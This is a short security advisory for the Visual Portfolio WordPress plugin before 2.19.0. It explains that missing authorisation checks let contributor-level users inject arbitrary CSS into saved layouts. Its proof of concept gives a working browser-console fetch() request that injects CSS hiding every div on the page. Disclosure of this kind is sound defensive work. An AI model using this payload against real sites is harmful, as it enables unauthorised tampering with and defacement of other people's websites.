Visual Portfolio < 2.19.0 - Contributor+ CSS Injection

The plugin does not have proper authorisation checks in some of its REST endpoints, allowing users with a role as low as contributor to call them and inject arbitrary CSS in arbitrary saved layouts

PoC

The post_id is the ID of a saved layout As a contributor, get a REST nonce via https://example.com/wp-admin/admin-ajax.php?action=rest-nonce Execute the below command (replacing the _wpnonce value by the nonce retrieved above) in the web developer console of the browser (while still being logged in as a contributor): fetch(‘/?rest_route=/visual-portfolio/v1/update_layout&_wpnonce=XXXX&post;_id=17&data;[vp_custom_css]=body{background-image:url(data://image/gif;base64,R0lGODdhKAAoAIABAAAAAP///ywAAAAAKAAoAAACX4yPqcvtD6OctNqLs968GwB4DkheJUSeUxqObCu98CJTtZvaL6quucjoAYfEovGI9M2MrJjwccM9G9FglXpVyJa0LW9n9X635Gy4jOZK02YoW1x5NzNytYWdzOv3/GIBADs=);}div{display:none !important};’, { method: ‘POST’, }).then(response => response.text()) .then(data => console.log(data));